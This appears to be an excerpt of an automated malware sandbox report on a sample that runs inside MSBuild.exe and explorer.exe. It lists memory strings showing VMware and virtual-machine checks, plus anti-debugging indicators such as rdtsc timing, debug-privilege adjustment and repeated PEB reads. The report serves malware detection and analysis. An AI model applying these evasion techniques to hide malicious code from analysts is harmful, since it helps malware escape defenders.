Source: explorer.exe, 0000000F.00000000.386228381.0000000008B4E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}0O
Source: explorer.exe, 0000001E.00000002.612120969.000000000D815000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 0000001E.00000003.564612786.000000000AB41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:T
Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 0000001E.00000003.564612786.000000000AB41000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:W
Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bd
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 0000001E.00000003.543609262.000000000A9B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000@v
Source: explorer.exe, 0000000F.00000000.379750748.0000000000F73000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_SATAL
Source: explorer.exe, 0000001E.00000003.563562422.000000000D815000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _VMware_SATA_CD00#5&280b647&
Source: explorer.exe, 0000001E.00000002.606120571.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000003.589975864.000000000DF93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZl+M
Source: H4vBtZsi8xAKaMm.exe, 00000001.00000002.341173431.000000000363B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000001E.00000000.489397348.0000000000EF9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001E.00000002.612089074.000000000D80B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}QQ}h
Source: explorer.exe, 0000001E.00000003.592811161.000000000DF93000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B>o
Source: explorer.exe, 0000000F.00000000.386228381.0000000008B4E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000F.00000000.386085770.0000000008ACF000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 0000001E.00000003.567907070.000000000A9F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NECVMWarVMware SATA CD001.00}E\Mn
Source: explorer.exe, 0000001E.00000003.564035684.000000000D827000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
Source: explorer.exe, 0000001E.00000003.559151451.000000000A910000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000P
Source: explorer.exe, 0000000F.00000000.383239790.00000000069DA000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: VMware SATA CD002
Source: explorer.exe, 0000001E.00000003.544259587.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.547185331.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.541475880.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.605753467.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.546230815.000000000A8C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll~
Source: explorer.exe, 0000001E.00000003.546996408.000000000A9B6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000uN%\
Source: explorer.exe, 0000001E.00000003.548258493.000000000A9FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000001E.00000000.475945374.0000000000F47000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000\

Anti Debugging
barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00409AA0 rdtsc 14_2_00409AA0
Enables debug privileges
Source: C:\Users\user\Desktop\H4vBtZsi8xAKaMm.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h] 14_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F8B8D0 mov ecx, dword ptr fs:[00000030h] 14_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h] 14_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h] 14_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h] 14_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F8B8D0 mov eax, dword ptr fs:[00000030h] 14_2_00F8B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2F0BF mov ecx, dword ptr fs:[00000030h] 14_2_00F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2F0BF mov eax, dword ptr fs:[00000030h] 14_2_00F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2F0BF mov eax, dword ptr fs:[00000030h] 14_2_00F2F0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F390AF mov eax, dword ptr fs:[00000030h] 14_2_00F390AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF9080 mov eax, dword ptr fs:[00000030h] 14_2_00EF9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F73884 mov eax, dword ptr fs:[00000030h] 14_2_00F73884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F73884 mov eax, dword ptr fs:[00000030h] 14_2_00F73884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FB2073 mov eax, dword ptr fs:[00000030h] 14_2_00FB2073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC1074 mov eax, dword ptr fs:[00000030h] 14_2_00FC1074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F10050 mov eax, dword ptr fs:[00000030h] 14_2_00F10050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F10050 mov eax, dword ptr fs:[00000030h] 14_2_00F10050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0B02A mov eax, dword ptr fs:[00000030h] 14_2_00F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0B02A mov eax, dword ptr fs:[00000030h] 14_2_00F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0B02A mov eax, dword ptr fs:[00000030h] 14_2_00F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0B02A mov eax, dword ptr fs:[00000030h] 14_2_00F0B02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F77016 mov eax, dword ptr fs:[00000030h] 14_2_00F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F77016 mov eax, dword ptr fs:[00000030h] 14_2_00F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F77016 mov eax, dword ptr fs:[00000030h] 14_2_00F77016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC4015 mov eax, dword ptr fs:[00000030h] 14_2_00FC4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC4015 mov eax, dword ptr fs:[00000030h] 14_2_00FC4015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFB1E1 mov eax, dword ptr fs:[00000030h] 14_2_00EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFB1E1 mov eax, dword ptr fs:[00000030h] 14_2_00EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFB1E1 mov eax, dword ptr fs:[00000030h] 14_2_00EFB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F841E8 mov eax, dword ptr fs:[00000030h] 14_2_00F841E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F261A0 mov eax, dword ptr fs:[00000030h] 14_2_00F261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F261A0 mov eax, dword ptr fs:[00000030h] 14_2_00F261A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F1C182 mov eax, dword ptr fs:[00000030h] 14_2_00F1C182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2A185 mov eax, dword ptr fs:[00000030h] 14_2_00F2A185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFC962 mov eax, dword ptr fs:[00000030h] 14_2_00EFC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFB171 mov eax, dword ptr fs:[00000030h] 14_2_00EFB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFB171 mov eax, dword ptr fs:[00000030h] 14_2_00EFB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F1B944 mov eax, dword ptr fs:[00000030h] 14_2_00F1B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F1B944 mov eax, dword ptr fs:[00000030h] 14_2_00F1B944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2513A mov eax, dword ptr fs:[00000030h] 14_2_00F2513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2513A mov eax, dword ptr fs:[00000030h] 14_2_00F2513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F14120 mov eax, dword ptr fs:[00000030h] 14_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F14120 mov eax, dword ptr fs:[00000030h] 14_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F14120 mov eax, dword ptr fs:[00000030h] 14_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F14120 mov eax, dword ptr fs:[00000030h] 14_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F14120 mov ecx, dword ptr fs:[00000030h] 14_2_00F14120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF9100 mov eax, dword ptr fs:[00000030h] 14_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF9100 mov eax, dword ptr fs:[00000030h] 14_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF9100 mov eax, dword ptr fs:[00000030h] 14_2_00EF9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0AAB0 mov eax, dword ptr fs:[00000030h] 14_2_00F0AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0AAB0 mov eax, dword ptr fs:[00000030h] 14_2_00F0AAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2FAB0 mov eax, dword ptr fs:[00000030h] 14_2_00F2FAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h] 14_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h] 14_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h] 14_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h] 14_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF52A5 mov eax, dword ptr fs:[00000030h] 14_2_00EF52A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2D294 mov eax, dword ptr fs:[00000030h] 14_2_00F2D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2D294 mov eax, dword ptr fs:[00000030h] 14_2_00F2D294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F3927A mov eax, dword ptr fs:[00000030h] 14_2_00F3927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FAB260 mov eax, dword ptr fs:[00000030h] 14_2_00FAB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FAB260 mov eax, dword ptr fs:[00000030h] 14_2_00FAB260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC8A62 mov eax, dword ptr fs:[00000030h] 14_2_00FC8A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF9240 mov eax, dword ptr fs:[00000030h] 14_2_00EF9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF9240 mov eax, dword ptr fs:[00000030h] 14_2_00EF9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF9240 mov eax, dword ptr fs:[00000030h] 14_2_00EF9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EF9240 mov eax, dword ptr fs:[00000030h] 14_2_00EF9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F84257 mov eax, dword ptr fs:[00000030h] 14_2_00F84257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F13A1C mov eax, dword ptr fs:[00000030h] 14_2_00F13A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F08A0A mov eax, dword ptr fs:[00000030h] 14_2_00F08A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC5BA5 mov eax, dword ptr fs:[00000030h] 14_2_00FC5BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2B390 mov eax, dword ptr fs:[00000030h] 14_2_00F2B390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FB138A mov eax, dword ptr fs:[00000030h] 14_2_00FB138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FAD380 mov ecx, dword ptr fs:[00000030h] 14_2_00FAD380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F01B8F mov eax, dword ptr fs:[00000030h] 14_2_00F01B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F01B8F mov eax, dword ptr fs:[00000030h] 14_2_00F01B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F23B7A mov eax, dword ptr fs:[00000030h] 14_2_00F23B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F23B7A mov eax, dword ptr fs:[00000030h] 14_2_00F23B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFDB60 mov ecx, dword ptr fs:[00000030h] 14_2_00EFDB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC8B58 mov eax, dword ptr fs:[00000030h] 14_2_00FC8B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFDB40 mov eax, dword ptr fs:[00000030h] 14_2_00EFDB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00EFF358 mov eax, dword ptr fs:[00000030h] 14_2_00EFF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FB131B mov eax, dword ptr fs:[00000030h] 14_2_00FB131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FB14FB mov eax, dword ptr fs:[00000030h] 14_2_00FB14FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F76CF0 mov eax, dword ptr fs:[00000030h] 14_2_00F76CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F76CF0 mov eax, dword ptr fs:[00000030h] 14_2_00F76CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F76CF0 mov eax, dword ptr fs:[00000030h] 14_2_00F76CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC8CD6 mov eax, dword ptr fs:[00000030h] 14_2_00FC8CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F0849B mov eax, dword ptr fs:[00000030h] 14_2_00F0849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F1746D mov eax, dword ptr fs:[00000030h] 14_2_00F1746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F8C450 mov eax, dword ptr fs:[00000030h] 14_2_00F8C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F8C450 mov eax, dword ptr fs:[00000030h] 14_2_00F8C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2A44B mov eax, dword ptr fs:[00000030h] 14_2_00F2A44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00F2BC2C mov eax, dword ptr fs:[00000030h] 14_2_00F2BC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 14_2_00FC740D mov eax, dword ptr fs:[00000030h] 14_2_00FC740D
